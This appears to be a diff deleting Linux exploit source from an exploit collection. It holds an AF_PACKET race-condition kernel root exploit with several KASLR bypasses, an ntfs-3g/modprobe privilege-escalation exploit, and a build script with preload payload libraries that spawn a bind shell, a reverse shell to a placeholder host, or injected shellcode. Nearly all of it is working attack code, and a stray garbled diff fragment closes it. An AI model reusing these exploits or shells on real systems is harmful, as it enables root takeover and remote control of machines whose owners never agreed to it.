-    c->proc_handler = (void *)(PROC_DOSTRING);
-    c->data = (void *)(MODPROBE_PATH);
-    c->maxlen = 256;
-    c->extra1 = (void *)(VSYSCALL+0xe00);
-    c->extra2 = (void *)(VSYSCALL+0xd00);
-
-    exploit(REGISTER_SYSCTL_TABLE, VSYSCALL+0x850, verify_stage2);
-
-    dprintf("[~] done, stage 2 completed\n");
-}
-
-// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *
-
-void check_procs() {
-    int min_procs = 2;
-
-    int nprocs = 0;
-    nprocs = get_nprocs_conf();
-
-    if (nprocs < min_procs) {
-        dprintf("[-] system has less than %d processor cores\n", min_procs);
-        exit(EXIT_FAILURE);
-    }
-
-    dprintf("[.] system has %d processor cores\n", nprocs);
-}
-
-struct utsname get_kernel_version() {
-    struct utsname u;
-    int rv = uname(&u);
-    if (rv != 0) {
-        dprintf("[-] uname())\n");
-        exit(EXIT_FAILURE);
-    }
-    return u;
-}
-
-#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
-
-void detect_versions() {
-    struct utsname u;
-    char kernel_version[512];
-
-    u = get_kernel_version();
-
-    if (strstr(u.machine, "64") == NULL) {
-        dprintf("[-] system is not using a 64-bit kernel\n");
-        exit(EXIT_FAILURE);
-    }
-
-    if (strstr(u.version, "-Ubuntu") == NULL) {
-        dprintf("[-] system is not using an Ubuntu kernel\n");
-        exit(EXIT_FAILURE);
-    }
-
-    char *u_ver = strtok(u.version, " ");
-    snprintf(kernel_version, 512, "%s %s", u.release, u_ver);
-
-    int i;
-    for (i = 0; i < ARRAY_SIZE(kernels); i++) {
-        if (strcmp(kernel_version, kernels[i].kernel_version) == 0) {
-            dprintf("[.] kernel version '%s' detected\n", kernels[i].kernel_version);
-            kernel = i;
-            return;
-        }
-    }
-
-    dprintf("[-] kernel version not recognized\n");
-    exit(EXIT_FAILURE);
-}
-
-// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
-
-#define SYSLOG_ACTION_READ_ALL 3
-#define SYSLOG_ACTION_SIZE_BUFFER 10
-
-bool mmap_syslog(char** buffer, int* size) {
-    *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
-    if (*size == -1) {
-        dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\n");
-        return false;
-    }
-
-    *size = (*size / getpagesize() + 1) * getpagesize();
-    *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE,
-                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
-
-    *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
-    if (*size == -1) {
-        dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL)\n");
-        return false;
-    }
-
-    return true;
-}
-
-unsigned long get_kernel_addr_trusty(char* buffer, int size) {
-    const char* needle1 = "Freeing unused";
-    char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
-    if (substr == NULL) return 0;
-
-    int start = 0;
-    int end = 0;
-    for (end = start; substr[end] != '-'; end++);
-
-    const char* needle2 = "ffffff";
-    substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
-    if (substr == NULL) return 0;
-
-    char* endptr = &substr[16];
-    unsigned long r = strtoul(&substr[0], &endptr, 16);
-
-    r &= 0xffffffffff000000ul;
-
-    return r;
-}
-
-unsigned long get_kernel_addr_xenial(char* buffer, int size) {
-    const char* needle1 = "Freeing unused";
-    char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
-    if (substr == NULL) {
-        return 0;
-    }
-
-    int start = 0;
-    int end = 0;
-    for (start = 0; substr[start] != '-'; start++);
-    for (end = start; substr[end] != '\n'; end++);
-
-    const char* needle2 = "ffffff";
-    substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
-    if (substr == NULL) {
-        return 0;
-    }
-
-    char* endptr = &substr[16];
-    unsigned long r = strtoul(&substr[0], &endptr, 16);
-
-    r &= 0xfffffffffff00000ul;
-    r -= 0x1000000ul;
-
-    return r;
-}
-
-unsigned long get_kernel_addr_syslog() {
-    unsigned long addr = 0;
-    char* syslog;
-    int size;
-
-    dprintf("[.] trying syslog...\n");
-
-    if (!mmap_syslog(&syslog, &size))
-        return 0;
-
-    if (strstr(kernels[kernel].kernel_version, "14.04.1") != NULL)
-        addr = get_kernel_addr_trusty(syslog, size);
-    else
-        addr = get_kernel_addr_xenial(syslog, size);
-
-    if (!addr)
-        dprintf("[-] kernel base not found in syslog\n");
-
-    return addr;
-}
-
-// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
-
-unsigned long get_kernel_addr_kallsyms() {
-    FILE *f;
-    unsigned long addr = 0;
-    char dummy;
-    char sname[256];
-    char* name = "startup_64";
-    char* path = "/proc/kallsyms";
-
-    dprintf("[.] trying %s...\n", path);
-    f = fopen(path, "r");
-    if (f == NULL) {
-        dprintf("[-] open/read(%s)\n", path);
-        return 0;
-    }
-
-    int ret = 0;
-    while (ret != EOF) {
-        ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
-        if (ret == 0) {
-            fscanf(f, "%s\n", sname);
-            continue;
-        }
-        if (!strcmp(name, sname)) {
-            fclose(f);
-            return addr;
-        }
-    }
-
-    fclose(f);
-    dprintf("[-] kernel base not found in %s\n", path);
-    return 0;
-}
-
-// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *
-
-unsigned long get_kernel_addr_sysmap() {
-    FILE *f;
-    unsigned long addr = 0;
-    char path[512] = "/boot/System.map-";
-    char version[32];
-
-    struct utsname u;
-    u = get_kernel_version();
-    strcat(path, u.release);
-    dprintf("[.] trying %s...\n", path);
-    f = fopen(path, "r");
-    if (f == NULL) {
-        dprintf("[-] open/read(%s)\n", path);
-        return 0;
-    }
-
-    char dummy;
-    char sname[256];
-    char* name = "startup_64";
-    int ret = 0;
-    while (ret != EOF) {
-        ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
-        if (ret == 0) {
-            fscanf(f, "%s\n", sname);
-            continue;
-        }
-        if (!strcmp(name, sname)) {
-            fclose(f);
-            return addr;
-        }
-    }
-
-    fclose(f);
-    dprintf("[-] kernel base not found in %s\n", path);
-    return 0;
-}
-
-// * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *
-
-unsigned long get_kernel_addr_mincore() {
-    unsigned char buf[getpagesize()/sizeof(unsigned char)];
-    unsigned long iterations = 20000000;
-    unsigned long addr = 0;
-
-    dprintf("[.] trying mincore info leak...\n");
-    /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
-    if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE,
-        MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
-        dprintf("[-] mmap()\n");
-        return 0;
-    }
-
-    int i;
-    for (i = 0; i <= iterations; i++) {
-        /* Touch a mishandle with this type mapping */
-        if (mincore((void*)0x86000000, 0x1000000, buf)) {
-            dprintf("[-] mincore()\n");
-            return 0;
-        }
-
-        int n;
-        for (n = 0; n < getpagesize()/sizeof(unsigned char); n++) {
-            addr = *(unsigned long*)(&buf[n]);
-            /* Kernel address space */
-            if (addr > 0xffffffff00000000) {
-                addr &= 0xffffffffff000000ul;
-                if (munmap((void*)0x66000000, 0x20000000000))
-                    dprintf("[-] munmap()\n");
-                return addr;
-            }
-        }
-    }
-
-    if (munmap((void*)0x66000000, 0x20000000000))
-        dprintf("[-] munmap()\n");
-
-    dprintf("[-] kernel base not found in mincore info leak\n");
-    return 0;
-}
-
-// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *
-
-unsigned long get_kernel_addr() {
-    unsigned long addr = 0;
-
-    addr = get_kernel_addr_kallsyms();
-    if (addr) return addr;
-
-    addr = get_kernel_addr_sysmap();
-    if (addr) return addr;
-
-    addr = get_kernel_addr_syslog();
-    if (addr) return addr;
-
-    addr = get_kernel_addr_mincore();
-    if (addr) return addr;
-
-    dprintf("[-] KASLR bypass failed\n");
-    exit(EXIT_FAILURE);
-
-    return 0;
-}
-
-// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
-
-void launch_rootshell(void)
-{
-    int fd;
-    char buf[256];
-    struct stat s;
-
-    fd = open(SYSCTL_PATH, O_WRONLY);
-
-    if(fd == -1) {
-        dprintf("[-] could not open %s\n", SYSCTL_PATH);
-        exit(EXIT_FAILURE);
-    }
-
-    memset(buf, '\x00', 256);
-
-    readlink("/proc/self/exe", (char *)&buf, 256);
-
-    write(fd, buf, strlen(buf)+1);
-
-    socket(AF_INET, SOCK_STREAM, 132);
-
-    if (stat(buf,&s) == 0 && s.st_uid == 0) {
-        dprintf("[+] binary executed by kernel, launching rootshell\n");
-        lseek(fd, 0, SEEK_SET);
-        write(fd, "/sbin/modprobe", 15);
-        close(fd);
-        execl(buf, buf, NULL);
-    } else {
-        dprintf("[-] could not create rootshell\n");
-        exit(EXIT_FAILURE);
-    }
-}
-
-void setup_sandbox() {
-    if (unshare(CLONE_NEWUSER) != 0) {
-        dprintf("[-] unshare(CLONE_NEWUSER)\n");
-        exit(EXIT_FAILURE);
-    }
-
-    if (unshare(CLONE_NEWNET) != 0) {
-        dprintf("[-] unshare(CLONE_NEWNET)\n");
-        exit(EXIT_FAILURE);
-    }
-}
-
-int main(int argc, char **argv)
-{
-    int status, pid;
-    struct utsname u;
-    char buf[512], *f;
-
-    if (getuid() == 0 && geteuid() == 0) {
-        chown("/proc/self/exe", 0, 0);
-        chmod("/proc/self/exe", 06755);
-        exit(0);
-    }
-
-    if (getuid() != 0 && geteuid() == 0) {
-        setresuid(0, 0, 0);
-        setresgid(0, 0, 0);
-        execl("/bin/bash", "bash", "-p", NULL);
-        exit(0);
-    }
-
-    dprintf("linux AF_PACKET race condition exploit by rebel\n");
-
-    dprintf("[.] starting\n");
-
-    dprintf("[.] checking hardware\n");
-    check_procs();
-    dprintf("[~] done, hardware looks good\n");
-
-    dprintf("[.] checking kernel version\n");
-    detect_versions();
-    dprintf("[~] done, version looks good\n");
-
-#if ENABLE_KASLR_BYPASS
-    dprintf("[.] KASLR bypass enabled, getting kernel base address\n");
-    KERNEL_BASE = get_kernel_addr();
-    dprintf("[~] done, kernel text:     %lx\n", KERNEL_BASE);
-#endif
-
-    dprintf("[.] proc_dostring:         %lx\n", PROC_DOSTRING);
-    dprintf("[.] modprobe_path:         %lx\n", MODPROBE_PATH);
-    dprintf("[.] register_sysctl_table: %lx\n", REGISTER_SYSCTL_TABLE);
-    dprintf("[.] set_memory_rw:         %lx\n", SET_MEMORY_RW);
-
-    pid = fork();
-    if (pid == 0) {
-        dprintf("[.] setting up namespace sandbox\n");
-        setup_sandbox();
-        dprintf("[~] done, namespace sandbox set up\n");
-        wrapper();
-        exit(0);
-    }
-
-    waitpid(pid, &status, 0);
-
-    launch_rootshell();
-    return 0;
-}
@@ -1,196 +0,0 @@
-#define _GNU_SOURCE
-#include <stdbool.h>
-#include <errno.h>
-#include <sys/inotify.h>
-#include <unistd.h>
-#include <err.h>
-#include <stdlib.h>
-#include <sys/stat.h>
-#include <sys/types.h>
-#include <fcntl.h>
-#include <sys/eventfd.h>
-#include <signal.h>
-#include <poll.h>
-#include <stdio.h>
-#include <sys/prctl.h>
-#include <string.h>
-#include <sys/wait.h>
-#include <time.h>
-#include <sys/utsname.h>
-
-int main(void) {
-  /* prevent shell from backgrounding ntfs-3g when stopped */
-  pid_t initial_fork_child = fork();
-  if (initial_fork_child == -1)
-    err(1, "initial fork");
-  if (initial_fork_child != 0) {
-    int status;
-    if (waitpid(initial_fork_child, &status, 0) != initial_fork_child)
-      err(1, "waitpid");
-    execl("rootshell", "rootshell", NULL);
-    exit(0);
-  }
-
-  char buf[1000] = {0};
-  // Set up workspace with volume, mountpoint, modprobe config and module directory.
-  char template[] = "/tmp/ntfs_sploit.XXXXXX";
-  if (mkdtemp(template) == NULL)
-    err(1, "mkdtemp");
-  char volume[100], mountpoint[100], modprobe_confdir[100], modprobe_conffile[100];
-  sprintf(volume, "%s/volume", template);
-  sprintf(mountpoint, "%s/mountpoint", template);
-  sprintf(modprobe_confdir, "%s/modprobe.d", template);
-  sprintf(modprobe_conffile, "%s/sploit.conf", modprobe_confdir);
-  if (mkdir(volume, 0777) || mkdir(mountpoint, 0777) || mkdir(modprobe_confdir, 0777))
-    err(1, "mkdir");
-  int conffd = open(modprobe_conffile, O_WRONLY|O_CREAT, 0666);
-  if (conffd == -1)
-    err(1, "open modprobe config");
-  int suidfile_fd = open("rootshell", O_RDONLY);
-  if (suidfile_fd == -1)
-    err(1, "unable to open ./rootshell");
-  char modprobe_config[200];
-  sprintf(modprobe_config, "alias fuse rootmod\noptions rootmod suidfile_fd=%d\n", suidfile_fd);
-  if (write(conffd, modprobe_config, strlen(modprobe_config)) != strlen(modprobe_config))
-    errx(1, "modprobe config write failed");
-  close(conffd);
-  // module directory setup
-  char system_cmd[1000];
-  sprintf(system_cmd, "mkdir -p %s/lib/modules/$(uname -r) && cp rootmod.ko *.bin %s/lib/modules/$(uname -r)/",
-    template, template);
-  if (system(system_cmd))
-    errx(1, "shell command failed");
-
-  // Set up inotify watch for /proc/mounts.
-  // Note: /proc/mounts is a symlink to /proc/self/mounts, so
-  // the watch will only see accesses by this process.
-  int inotify_fd = inotify_init1(IN_CLOEXEC);
-  if (inotify_fd == -1)
-    err(1, "unable to create inotify fd?");
-  if (inotify_add_watch(inotify_fd, "/proc/mounts", IN_OPEN) == -1)
-    err(1, "unable to watch /proc/mounts");
-
-  // Set up inotify watch for /proc/filesystems.
-  // This can be used to detect whether we lost the race.
-  int fs_inotify_fd = inotify_init1(IN_CLOEXEC);
-  if (fs_inotify_fd == -1)
-    err(1, "unable to create inotify fd?");
-  if (inotify_add_watch(fs_inotify_fd, "/proc/filesystems", IN_OPEN) == -1)
-    err(1, "unable to watch /proc/filesystems");
-
-  // Set up inotify watch for /sbin/modprobe.
-  // This can be used to detect when we can release all our open files.
-  int modprobe_inotify_fd = inotify_init1(IN_CLOEXEC);
-  if (modprobe_inotify_fd == -1)
-    err(1, "unable to create inotify fd?");
-  if (inotify_add_watch(modprobe_inotify_fd, "/sbin/modprobe", IN_OPEN) == -1)
-    err(1, "unable to watch /sbin/modprobe");
-
-  int do_exec_pipe[2];
-  if (pipe2(do_exec_pipe, O_CLOEXEC))
-    err(1, "pipe");
-  pid_t child = fork();
-  if (child == -1)
-    err(1, "fork");
-  if (child != 0) {
-    if (read(do_exec_pipe[0], buf, 1) != 1)
-      errx(1, "pipe read failed");
-    char modprobe_opts[300];
-    sprintf(modprobe_opts, "-C %s -d %s", modprobe_confdir, template);
-    setenv("MODPROBE_OPTIONS", modprobe_opts, 1);
-    execlp("ntfs-3g", "ntfs-3g", volume, mountpoint, NULL);
-  }
-  child = getpid();
-
-  // Now launch ntfs-3g and wait until it opens /proc/mounts
-  if (write(do_exec_pipe[1], buf, 1) != 1)
-    errx(1, "pipe write failed");
-
-  if (read(inotify_fd, buf, sizeof(buf)) <= 0)
-    errx(1, "inotify read failed");
-  if (kill(getppid(), SIGSTOP))
-    err(1, "can't stop setuid parent");
-
-  // Check whether we won the main race.
-  struct pollfd poll_fds[1] = {{
-    .fd = fs_inotify_fd,
-    .events = POLLIN
-  }};
-  int poll_res = poll(poll_fds, 1, 100);
-  if (poll_res == -1)
-    err(1, "poll");
-  if (poll_res == 1) {
-    puts("looks like we lost the race");
-    if (kill(getppid(), SIGKILL))
-      perror("SIGKILL after lost race");
-    char rm_cmd[100];
-    sprintf(rm_cmd, "rm -rf %s", template);
-    system(rm_cmd);
-    exit(1);
-  }
-  puts("looks like we won the race");
-
-  // Open as many files as possible. Whenever we have
-  // a bunch of open files, move them into a new process.
-  int total_open_files = 0;
-  while (1) {
-    #define LIMIT 500
-    int open_files[LIMIT];
-    bool reached_limit = false;
-    int n_open_files;
-    for (n_open_files = 0; n_open_files < LIMIT; n_open_files++) {
-      open_files[n_open_files] = eventfd(0, 0);
-      if (open_files[n_open_files] == -1) {
-        if (errno != ENFILE)
-          err(1, "eventfd() failed");
-        printf("got ENFILE at %d total\n", total_open_files);
-        reached_limit = true;
-        break;
-      }
-      total_open_files++;
-    }
-    pid_t fd_stasher_child = fork();
-    if (fd_stasher_child == -1)
-      err(1, "fork (for eventfd holder)");
-    if (fd_stasher_child == 0) {
-      prctl(PR_SET_PDEATHSIG, SIGKILL);
-      // close PR_SET_PDEATHSIG race window
-      if (getppid() != child) raise(SIGKILL);
-      while (1) pause();
-    }
-    for (int i = 0; i < n_open_files; i++)
-      close(open_files[i]);
-    if (reached_limit)
-      break;
-  }
-
-  // Wake up ntfs-3g and keep allocating files, then free up
-  // the files as soon as we're reasonably certain that either
-  // modprobe was spawned or the attack failed.
-  if (kill(getppid(), SIGCONT))
-    err(1, "SIGCONT");
-
-  time_t start_time = time(NULL);
-  while (1) {
-    for (int i=0; i<1000; i++) {
-      int efd = eventfd(0, 0);
-      if (efd == -1 && errno != ENFILE)
-        err(1, "gapfiller eventfd() failed unexpectedly");
-    }
-    struct pollfd modprobe_poll_fds[1] = {{
-      .fd = modprobe_inotify_fd,
-      .events = POLLIN
-    }};
-    int modprobe_poll_res = poll(modprobe_poll_fds, 1, 0);
-    if (modprobe_poll_res == -1)
-      err(1, "poll");
-    if (modprobe_poll_res == 1) {
-      puts("yay, modprobe ran!");
-      exit(0);
-    }
-    if (time(NULL) > start_time + 3) {
-      puts("modprobe didn't run?");
-      exit(1);
-    }
-  }
-}
@@ -1,48 +0,0 @@
-#!/bin/bash
-
-build () {
-  CC=$1
-  TARGET_SUFFIX=$2
-  CFLAGS=$3
-
-  echo "[*] Building for ${TARGET_SUFFIX}..."
-  for type in {shellcode,system,reverse,bind}
-   do ${CC} ${CFLAGS} -Wall -fPIC -fno-stack-protector -Os goahead-cgi-${type}.c -s -shared -o goahead-cgi-${type}-${TARGET_SUFFIX}.so
-  done
-}
-
-rm -f *.o *.so *.gz
-
-#
-# Linux GLIBC
-#
-
-# x86
-build "gcc" "linux-glibc-x86_64" "-m64 -D OLD_LIB_SET_2"
-build "gcc" "linux-glibc-x86" "-m32 -D OLD_LIB_SET_1"
-
-# ARM
-build "arm-linux-gnueabi-gcc-5" "linux-glibc-armel" "-march=armv5 -mlittle-endian"
-build "arm-linux-gnueabihf-gcc-5" "linux-glibc-armhf" "-march=armv7 -mlittle-endian"
-build "aarch64-linux-gnu-gcc-4.9" "linux-glibc-aarch64" ""
-
-# MIPS
-build "mips-linux-gnu-gcc-5" "linux-glibc-mips" "-D OLD_LIB_SET_1"
-build "mipsel-linux-gnu-gcc-5"  "linux-glibc-mipsel" "-D OLD_LIB_SET_1"
-build "mips64-linux-gnuabi64-gcc-5"  "linux-glibc-mips64" "-D OLD_LIB_SET_1"
-build "mips64el-linux-gnuabi64-gcc-5" "linux-glibc-mips64el" "-D OLD_LIB_SET_1"
-
-# SPARC
-build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc64" ""
-build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc" "-m32 -D OLD_LIB_SET_1"
-
-# PowerPC
-build "powerpc-linux-gnu-gcc-5" "linux-glibc-powerpc" "-D OLD_LIB_SET_1"
-build "powerpc64-linux-gnu-gcc-5" "linux-glibc-powerpc64" ""
-build "powerpc64le-linux-gnu-gcc-4.9" "linux-glibc-powerpc64le" ""
-
-# S390X
-build "s390x-linux-gnu-gcc-5" "linux-glibc-s390x" ""
-
-gzip -9 *.so
-rm -f *.o *.so
@@ -1,96 +0,0 @@
-#include <arpa/inet.h>
-#include <netdb.h>
-#include <netinet/in.h>
-#include <stdbool.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <sys/mman.h>
-#include <sys/socket.h>
-#include <sys/types.h>
-#include <sys/wait.h>
-#include <unistd.h>
-
-#ifdef OLD_LIB_SET_1
-__asm__(".symver system,system@GLIBC_2.0");
-__asm__(".symver fork,fork@GLIBC_2.0");
-#endif
-
-#ifdef OLD_LIB_SET_2
-__asm__(".symver system,system@GLIBC_2.2.5");
-__asm__(".symver fork,fork@GLIBC_2.2.5");
-#endif
-
-static void _bind_tcp_shell(void) {
-
-  int sfd, fd, i;
-  struct sockaddr_in addr,saddr;
-  unsigned int saddr_len = sizeof(struct sockaddr_in);
-
-  char *lport = "55555";
-  char *shells[] = {
-    "/bin/bash",
-    "/usr/bin/bash",
-    "/bin/sh",
-    "/usr/bin/sh",
-    "/bin/ash",
-    "/usr/bin/ash",
-    "/bin/dash",
-    "/usr/bin/dash",
-    "/bin/csh",
-    "/usr/bin/csh",
-    "/bin/ksh",
-    "/usr/bin/ksh",
-    "/bin/busybox",
-    "/usr/bin/busybox",
-    NULL
-  };
-
-  sfd = socket(AF_INET, SOCK_STREAM, 0);
-  setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &(int){ 1 }, sizeof(int));
-
-  saddr.sin_family = AF_INET;
-  saddr.sin_port = htons(atoi(lport));
-  saddr.sin_addr.s_addr = INADDR_ANY;
-  bzero(&saddr.sin_zero, 8);
-
-  if (bind(sfd, (struct sockaddr *) &saddr, saddr_len) == -1) {
-    exit(1);
-  }
-
-  if (listen(sfd, 5) == -1) {
-    close(sfd);
-    exit(1);
-  }
-
-  fd = accept(sfd, (struct sockaddr *) &addr, &saddr_len);
-  close(sfd);
-
-  if (fd == -1) {
-    exit(1);
-  }
-
-  for (i=0; i<3; i++) {
-    dup2(fd, i);
-  }
-
-  /* Keep trying until execl() succeeds */
-  for (i=0; ; i++) {
-    if (shells[i] == NULL) break;
-    execl(shells[i], "sh", NULL);
-  }
-
-  /* Close the connection if we failed to find a shell */
-  close(fd);
-}
-
-static void _run_payload_(void) __attribute__((constructor));
-
-static void _run_payload_(void)
-{
-    unsetenv("LD_PRELOAD");
-    if (! fork())
-      _bind_tcp_shell();
-
-    exit(0);
-}
@@ -1,84 +0,0 @@
-#include <arpa/inet.h>
-#include <netdb.h>
-#include <netinet/in.h>
-#include <stdbool.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <sys/mman.h>
-#include <sys/socket.h>
-#include <sys/types.h>
-#include <sys/wait.h>
-#include <unistd.h>
-
-#ifdef OLD_LIB_SET_1
-__asm__(".symver system,system@GLIBC_2.0");
-__asm__(".symver fork,fork@GLIBC_2.0");
-#endif
-
-#ifdef OLD_LIB_SET_2
-__asm__(".symver system,system@GLIBC_2.2.5");
-__asm__(".symver fork,fork@GLIBC_2.2.5");
-#endif
-
-static void _reverse_tcp_shell(void) {
-
-  int fd, i;
-  struct sockaddr_in addr;
-  char *lport = "55555";
-  char *lhost = "000.000.000.000";
-  char *shells[] = {
-    "/bin/bash",
-    "/usr/bin/bash",
-    "/bin/sh",
-    "/usr/bin/sh",
-    "/bin/ash",
-    "/usr/bin/ash",
-    "/bin/dash",
-    "/usr/bin/dash",
-    "/bin/csh",
-    "/usr/bin/csh",
-    "/bin/ksh",
-    "/usr/bin/ksh",
-    "/bin/busybox",
-    "/usr/bin/busybox",
-    NULL
-  };
-
-  fd = socket(PF_INET, SOCK_STREAM, 0);
-  addr.sin_port = htons(atoi(lport));
-  addr.sin_addr.s_addr = inet_addr(lhost);
-  addr.sin_family = AF_INET;
-
-  memset(addr.sin_zero, 0, sizeof(addr.sin_zero));
-
-  for (i=0; i<10; i++) {
-    if (! connect(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr))) {
-      break;
-    }
-  }
-
-  for (i=0; i<3; i++) {
-    dup2(fd, i);
-  }
-
-  /* Keep trying until execl() succeeds */
-  for (i=0; ; i++) {
-    if (shells[i] == NULL) break;
-    execl(shells[i], "sh", NULL);
-  }
-
-  /* Close the connection if we failed to find a shell */
-  close(fd);
-}
-
-static void _run_payload_(void) __attribute__((constructor));
-
-static void _run_payload_(void)
-{
-    unsetenv("LD_PRELOAD");
-    if (! fork())
-      _reverse_tcp_shell();
-
-    exit(0);
-}
@@ -1,44 +0,0 @@
-#include <stdio.h>
-#include <stdbool.h>
-#include <unistd.h>
-#include <sys/mman.h>
-#include <string.h>
-#include <signal.h>
-#include <stdlib.h>
-
-#ifdef OLD_LIB_SET_1
-__asm__(".symver mmap,mmap@GLIBC_2.0");
-__asm__(".symver memcpy,memcpy@GLIBC_2.0");
-__asm__(".symver fork,fork@GLIBC_2.0");
-#endif
-
-#ifdef OLD_LIB_SET_2
-__asm__(".symver mmap,mmap@GLIBC_2.2.5");
-__asm__(".symver memcpy,memcpy@GLIBC_2.2.5");
-__asm__(".symver fork,fork@GLIBC_2.2.5");
-#endif
-
-#define PAYLOAD_SIZE 5000
-unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};
-
-static void _run_payload_(void) __attribute__((constructor));
-
-static void _run_payload_(void)
-{
-  void *mem;
-  void (*fn)();
-
-  unsetenv("LD_PRELOAD");
-
-  mem = mmap(NULL, PAYLOAD_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
-  if (mem == MAP_FAILED)
-    return;
-
-  memcpy(mem, payload, PAYLOAD_SIZE);
-  fn = (void(*)())mem;
-
-  if (! fork())
-    fn();
-
-  exit(0);
-}
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .5.1
 .3.1